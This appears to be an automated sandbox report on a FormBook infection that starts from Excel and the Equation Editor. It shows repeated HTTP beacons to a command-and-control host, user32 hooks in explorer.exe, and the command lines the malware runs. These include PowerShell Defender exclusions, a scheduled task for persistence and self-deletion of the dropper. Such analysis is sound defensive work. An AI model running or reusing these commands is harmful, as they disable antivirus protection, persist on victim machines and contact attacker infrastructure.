                                            May 4, 2021 16:42:08.077815056 CEST775OUTGET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
                                            Host: www.20svip.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 4, 2021 16:42:14.802071095 CEST775OUTGET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
                                            Host: www.20svip.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 4, 2021 16:42:28.250493050 CEST775OUTGET /op9s/?K6AhK=ON6d4TF&2dl=WVpgvCfCKFxjsYGtekiOGQyeBTiHa9iswHtNMSjSk0aOhTAJ8ULc9AeWVXTq4zeX0h/y8A== HTTP/1.1
                                            Host: www.20svip.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: USER32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:16:40:37
                                            Start date:04/05/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                            Imagebase:0x13f4b0000
                                            File size:27641504 bytes
                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:16:40:58
                                            Start date:04/05/2021
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:16:41:01
                                            Start date:04/05/2021
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\Public\vbc.exe'
                                            Imagebase:0xa00000
                                            File size:734720 bytes
                                            MD5 hash:BA01DF16E4C876E078348FD4479A8FDF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2156549427.0000000003529000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low

                                            General

                                            Start time:16:41:03
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
                                            Imagebase:0x22100000
                                            File size:452608 bytes
                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            General

                                            Start time:16:41:04
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
                                            Imagebase:0x22100000
                                            File size:452608 bytes
                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            General

                                            Start time:16:41:04
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'
                                            Imagebase:0xe30000
                                            File size:179712 bytes
                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:16:41:07
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
                                            Imagebase:0x22100000
                                            File size:452608 bytes
                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            General

                                            Start time:16:41:09
                                            Start date:04/05/2021
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\Public\vbc.exe
                                            Imagebase:0xa00000
                                            File size:734720 bytes
                                            MD5 hash:BA01DF16E4C876E078348FD4479A8FDF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2185026230.00000000001C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2184970826.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2185065493.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:16:41:12
                                            Start date:04/05/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0xffca0000
                                            File size:3229696 bytes
                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:16:41:23
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\cmmon32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                            Imagebase:0x340000
                                            File size:43008 bytes
                                            MD5 hash:EA7BAAB0792C846DE451001FAE0FBD5F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2346373923.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2346554018.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2346501293.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:16:41:29
                                            Start date:04/05/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\Public\vbc.exe'
                                            Imagebase:0x49d20000
                                            File size:302592 bytes
                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >